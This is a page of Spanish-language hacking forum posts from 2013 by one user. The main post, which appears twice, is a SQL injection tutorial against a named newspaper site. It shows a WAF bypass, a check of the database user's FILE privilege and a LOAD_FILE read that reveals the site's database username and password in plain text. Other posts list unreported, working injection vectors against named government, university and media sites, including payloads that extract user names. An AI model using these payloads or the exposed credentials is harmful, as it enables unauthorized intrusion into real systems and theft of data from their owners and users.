Disculpa Reparado!
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#62
Bugs y Exploits / Re:MYSQLI EB con extractvalue()
Julio 26, 2013, 11:52:08 PM
Muy bueno, te felicito!
#63
Bugs y Exploits / Re:Full Source Disclosure por SQLI
Julio 26, 2013, 11:49:22 PM
Es parecido a LFI por medio de SQLI pero con distintos fines, sino se puede incluir /etc/passwd y ver entre los usuarios el path que corresponde a esa web
#64
Hacking ShowOff / SQL Double Query http://www.agenciasuburbana.com.ar
Julio 25, 2013, 11:49:48 PM
#65
Hacking ShowOff / SQLI Error Based Diario Mirada21.es
Julio 25, 2013, 10:19:07 PM
#66
Hacking ShowOff / SQLI Organo Profesional de los Ingenieros de Caminos Canales y Puertos
Julio 25, 2013, 10:08:43 PM
#68
Hacking ShowOff / SQLI Diario abc.es
Julio 25, 2013, 09:51:25 PM
#69
Dudas y pedidos generales / Re:como burlar esta opcion en google chrome
Julio 25, 2013, 09:17:03 PM
probaste dentro de un zip o dentro de un rar?
#70
Bugs y Exploits / Full Source Disclosure por SQLI
Julio 25, 2013, 04:01:18 AM
Bueno volviendo despues de un tiempo que me tuve que tomar por la facutad, aprovecho para dejar este aporte:
Veamos esta Web con SQLI:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
despues de explotar el sqli y Bypassear el WAF queda asi:
Vector:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login /*!50000union*/ /*!50000select*/ 1,2,3,0x6864627265616b6572,version(),6,user(),8,@@datadir,10,11,12,13,14,15,16 limit 1,1-- -c
como podemos ver, la inyección es Union Based, y saltamos un WAF que solo filtra union y select, ahora mi pregunta es si el usuario
lasema@localhost
Tiene privilegios de Apertura de Ficheros, nos fijamos de la siguiente manera:
Dentro de information_schema existe una tabla que se llama USER_PRIVILEGES,
Dentro de esta tabla existe 2 campos que nos interesan:
GRANTEE: Posee los nombre de usuario de la base de datos.
PRIVILEGE_TYPE: Tipo de privilegio que tiene el usuario.
entonces la logica, nos dice que tenemos que formular algo como esto:
select * from information_schema.USER_PRIVILEGES;
pero esto nos devolveria muchos usuarios que no nos interesan que permisos tienen,
nosotros queremos saber que permisos tiene: "lasema@localhost" espesificamente si tiene el permiso FILE, a mi se me ocurre algo como esto:
SELECT GRANTEE FROM INFORMATION_SCHEMA.USER_PRIVILEGES WHERE PRIVILEGE_TYPE="FILE";
esto nos mostraria todos los usuarios que tienen permisos FILE en la base de datos, entre eso buscaremos si se encuentra "lasema@localhost"
entonces acoplamos nuestra query sql a nuestra sentencia SQLI quedando de esta forma:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login /*!50000union*/ /*!50000select*/ 1,2,3,4,version(),6,user(),group_concat(GRANTEE),@@datadir,10,11,12,13,14,15,16 from information_schema.USER_PRIVILEGES WHERE PRIVILEGE_TYPE=0x46494c45 limit 1,1-- -c
donde 0x46494c45 es el hexadecimal de FILE (Esto lo hacemos ya que no podemos encapsular FILE entre ' ' o " ")
vemos que nos devuelve esto:
podemos ver que al usar group_concat, la injection no logra ser completamente visible desde la interface de usuario, por lo que nos aventuraremos a ver el Source Code y buscando la palabra root nos posicionaremos sobre la linea de la injection:
Como podemos observar "lasema" aparece en esa linea, por lo que podemos determinar que el usuario "lasema@localhost" tiene permisos de FILE y podemos realizar lectura de archivo.
Para esto implementaremos nuestro querido:
LOAD_FILE("RUTA/ARCHIVO")
Bueno lo primero que debemos lograr es un Patch Disclosure que nos diga donde estamos parado, para esto vamos a intentar generar un error con caracteres invalidos para la web:
A mi se me ocurre poner algo tan simple como una ' y logro obtener esta respuesta:
podemos apreciar:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/docs/lasemana.es/periodico/noticia.php on line 8
donde mysql nos vuelve a dar una mano y nos revela nuestro patch disclosure: /var/www/docs/lasemana.es/periodico/noticia.php
Recapitulando:
Gracias a nuestro usuario "lasema@localhost" que posee privilegios de FILE podremos realizar LOAD_FILE(RUTA) donde RUTA el path de nuestro Patch Disclosure!
Manos a la Obra:
Nuestra SQLI queda de esta Forma:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login /*!50000union*/ /*!50000select*/ 1,2,3,4,version(),6,user(),LOAD_FILE(0x2f7661722f7777772f646f63732f6c6173656d616e612e65732f706572696f6469636f2f6e6f74696369612e706870),@@datadir,10,11,12,13,14,15,16 limit 1,1-- -c
Donde 0x2f7661722f7777772f646f63732f6c6173656d616e612e65732f706572696f6469636f2f6e6f74696369612e706870 es el hexadeciman de: /var/www/docs/lasemana.es/periodico/noticia.php (Ruta de nuestro Path Disclouse)
y Observaremos algo que esta muy enquilombado y no se entiende nada XD
por lo que asumo que desde nuestro codigo fuente se vera mas ordenado
y vemos muy claramente, el usuario y password de la base de datos:
$usuario = "lasema";
$contraseña = "arcaliso";
$conexion = mysql_connect("localhost", "$usuario","$contraseña") or mail ("[email protected]","607720916","Se ha caido el Servidor","From: SOPORTE <[email protected]>");
Espero que les sea de Utilidad!
HD_Breaker
Realizar FSD por medio de SQLI:
Veamos esta Web con SQLI:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
despues de explotar el sqli y Bypassear el WAF queda asi:
Vector:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login /*!50000union*/ /*!50000select*/ 1,2,3,0x6864627265616b6572,version(),6,user(),8,@@datadir,10,11,12,13,14,15,16 limit 1,1-- -c
como podemos ver, la inyección es Union Based, y saltamos un WAF que solo filtra union y select, ahora mi pregunta es si el usuario
lasema@localhost
Tiene privilegios de Apertura de Ficheros, nos fijamos de la siguiente manera:
Dentro de information_schema existe una tabla que se llama USER_PRIVILEGES,
Dentro de esta tabla existe 2 campos que nos interesan:
GRANTEE: Posee los nombre de usuario de la base de datos.
PRIVILEGE_TYPE: Tipo de privilegio que tiene el usuario.
entonces la logica, nos dice que tenemos que formular algo como esto:
select * from information_schema.USER_PRIVILEGES;
pero esto nos devolveria muchos usuarios que no nos interesan que permisos tienen,
nosotros queremos saber que permisos tiene: "lasema@localhost" espesificamente si tiene el permiso FILE, a mi se me ocurre algo como esto:
SELECT GRANTEE FROM INFORMATION_SCHEMA.USER_PRIVILEGES WHERE PRIVILEGE_TYPE="FILE";
esto nos mostraria todos los usuarios que tienen permisos FILE en la base de datos, entre eso buscaremos si se encuentra "lasema@localhost"
entonces acoplamos nuestra query sql a nuestra sentencia SQLI quedando de esta forma:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login /*!50000union*/ /*!50000select*/ 1,2,3,4,version(),6,user(),group_concat(GRANTEE),@@datadir,10,11,12,13,14,15,16 from information_schema.USER_PRIVILEGES WHERE PRIVILEGE_TYPE=0x46494c45 limit 1,1-- -c
donde 0x46494c45 es el hexadecimal de FILE (Esto lo hacemos ya que no podemos encapsular FILE entre ' ' o " ")
vemos que nos devuelve esto:
podemos ver que al usar group_concat, la injection no logra ser completamente visible desde la interface de usuario, por lo que nos aventuraremos a ver el Source Code y buscando la palabra root nos posicionaremos sobre la linea de la injection:
Como podemos observar "lasema" aparece en esa linea, por lo que podemos determinar que el usuario "lasema@localhost" tiene permisos de FILE y podemos realizar lectura de archivo.
Para esto implementaremos nuestro querido:
LOAD_FILE("RUTA/ARCHIVO")
Bueno lo primero que debemos lograr es un Patch Disclosure que nos diga donde estamos parado, para esto vamos a intentar generar un error con caracteres invalidos para la web:
A mi se me ocurre poner algo tan simple como una ' y logro obtener esta respuesta:
podemos apreciar:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/docs/lasemana.es/periodico/noticia.php on line 8
donde mysql nos vuelve a dar una mano y nos revela nuestro patch disclosure: /var/www/docs/lasemana.es/periodico/noticia.php
Recapitulando:
Gracias a nuestro usuario "lasema@localhost" que posee privilegios de FILE podremos realizar LOAD_FILE(RUTA) donde RUTA el path de nuestro Patch Disclosure!
Manos a la Obra:
Nuestra SQLI queda de esta Forma:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login /*!50000union*/ /*!50000select*/ 1,2,3,4,version(),6,user(),LOAD_FILE(0x2f7661722f7777772f646f63732f6c6173656d616e612e65732f706572696f6469636f2f6e6f74696369612e706870),@@datadir,10,11,12,13,14,15,16 limit 1,1-- -c
Donde 0x2f7661722f7777772f646f63732f6c6173656d616e612e65732f706572696f6469636f2f6e6f74696369612e706870 es el hexadeciman de: /var/www/docs/lasemana.es/periodico/noticia.php (Ruta de nuestro Path Disclouse)
y Observaremos algo que esta muy enquilombado y no se entiende nada XD
por lo que asumo que desde nuestro codigo fuente se vera mas ordenado
y vemos muy claramente, el usuario y password de la base de datos:
$usuario = "lasema";
$contraseña = "arcaliso";
$conexion = mysql_connect("localhost", "$usuario","$contraseña") or mail ("[email protected]","607720916","Se ha caido el Servidor","From: SOPORTE <[email protected]>");
Espero que les sea de Utilidad!
HD_Breaker
#71
Hacking ShowOff / SQLI WAF Bypass y SQLI LoadFile http://www.lasemana.es/
Julio 25, 2013, 02:55:56 AM
SQLI
Vector: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login /*!50000union*/ /*!50000select*/ 1,2,3,0x6864627265616b6572,version(),6,user(),load_file(0x2f7661722f6c69622f6d7973716c2f746573742e747874),@@datadir,10,11,12,13,14,15,16 limit 1,1-- -c
Reportado: No
#72
Hacking ShowOff / SQLI Double Query http://www.mirada21.es/
Julio 25, 2013, 02:38:04 AM
#73
Hacking ShowOff / SQLI http://um.es (Universidad de Murcia)
Julio 25, 2013, 02:26:35 AM
#74
Hacking ShowOff / Re:SQLI http://www.vialidad.gba.gov.ar/
Julio 25, 2013, 02:24:55 AM
Si sabia que había shell, pero queria compartir el sqli que encontre, y q de hecho parece no estar reportado, ni por mi ni por los que subieron shell
#75
Hacking ShowOff / SQLI Sistema Sismografico Mendoza
Julio 08, 2013, 10:38:05 PM
#76
Hacking ShowOff / SQLI Double Query http://www.kier.com.ar/
Julio 08, 2013, 09:54:38 PM
SQLI
Vector: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login and (select 1 from(select count(*),concat((select (select (database()))),floor(rand(0)*2))a from information_schema.columns group by a)b)--+&page=0&PHPSESSID=7c7e4196fbbd700a469d53af8fe95b26
Reportado: No
#77
Hacking ShowOff / SQLI Diario http://www.eldebate.com.ar/
Julio 08, 2013, 08:54:32 PM
#78
Dudas y pedidos generales / Re:¿Qué hago con la shellcode?
Junio 30, 2013, 08:35:20 PM
Recomendación... primero aprende C o cualquier otro lenguaje de programación, aprende desde lo mínimo hasta donde puedas y después intenta meterte en el mundo de los exploits porq... si no sabes programar como sabras en q sector de memoria están las cosas, osea no sabes ni lo que es un array por lo q veo, y eso realmente es bacico, aprende a programar antes de proseguir... sino la gente te va a estar haciendo tu trabajo y nunca vas a aprender por mas q llores grites o patalees, eso es la programación bro prueba y error 1000 veces hasta q sepas q estas haciendo y por favor estudíate un lenguaje de programación enserio, para saber que es una variable cuales son los bloques de programación aprende programación estructurada y luego programación orientada a objetos, yo te recomiendo empezar por python es lindo potente y simple, y puedes generar exploits
#79
Hacking ShowOff / Re:SQLI http://webhosting.redsalud.gov.cl/
Junio 29, 2013, 03:23:11 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Lo hago publico con la finalidad de darle una mano a la gente que quiere aprender y ver vectores reales y puedan probar o hacerse a la idea de distintas formas de hacer sqli, y el plus se lo doy ya que son webs del gobierno y llegado el momento que haga el tiempito, voy a empesar a reportar todo mientras tanto y mientras no se reparen los fallos pueden ir testeando, he publicado otras sqli con waf bypass, para justamente ayudar a otras personas a experimentar y ver otros vectores. Varios amigos han podido aplicar otros metodos como double error y otros metodos de filtrado de waf del los cuales tambien he aprendido cosas muy utiles al estudiar sus vectores, y asi tanto yo como la gente que quiera investigar un poco mas podemos hacer un reflujo de conocimiento, y pasarnos vectores personalizados y nuevos para ir aprendiendo.
Ademas le doy un poco mas de vida a la sección!
Saludos compa;
estoy totalmente de acuerdo con lo que dices; el compartir conocimientos e intercambiar ideas...!!!, haciendo asi que otro se interesen en el tema como los que se estaban realizando en los wargames donde se colocaban Retos con el fin meramente educativo... de escenarios reales...
para dejar volar la imaginacion y los conocimientos en cuanto a los diversos retos.., lo que si no comparto es la publicacion del vector... asi se pierde la magia, el encanto, no dejas que la curiosidad de como obtener el vector, y solo facilitas lameradas como me dijeron alguna vez con respecto a una web gubernamental...
yo creo q las lammereadas van en la etica de cada persona, como vieron encontre varios sqli en web del gobierno y no he hecho absolutamente ningun daño, el vector es obligatorio en las normas de hacking showoff, de hay en mas quien lo utilice para hacer daño, queda en el si lo meten preso... ahora yo propongo algo, por ej si yo muestro un vector union select, porq alguien mas no intenta un double query? o si yo llego solo hasta mostrar la version porq tiene waf porq no tomar el vector y ver si pueden saltar el waf... e ir compartiendo los vectores q vamos encontrando con el fin de aprender otras perspectivas y pensamientos de como afrontar el problema
#80
Hacking ShowOff / Re:SQLI Doble Query www.uibm.gov.it
Junio 28, 2013, 04:09:21 PM
Hola vengo a Completarla! Buen fallo cronos!
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login and(select 1 from(select min(0),(select concat(0x7e,(select concat(username) from jos_users limit 0,1),0x7e,floor(rand(0)*2)))a from information_schema.tables group by a)b)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login and(select 1 from(select min(0),(select concat(0x7e,(select concat(username) from jos_users limit 0,1),0x7e,floor(rand(0)*2)))a from information_schema.tables group by a)b)
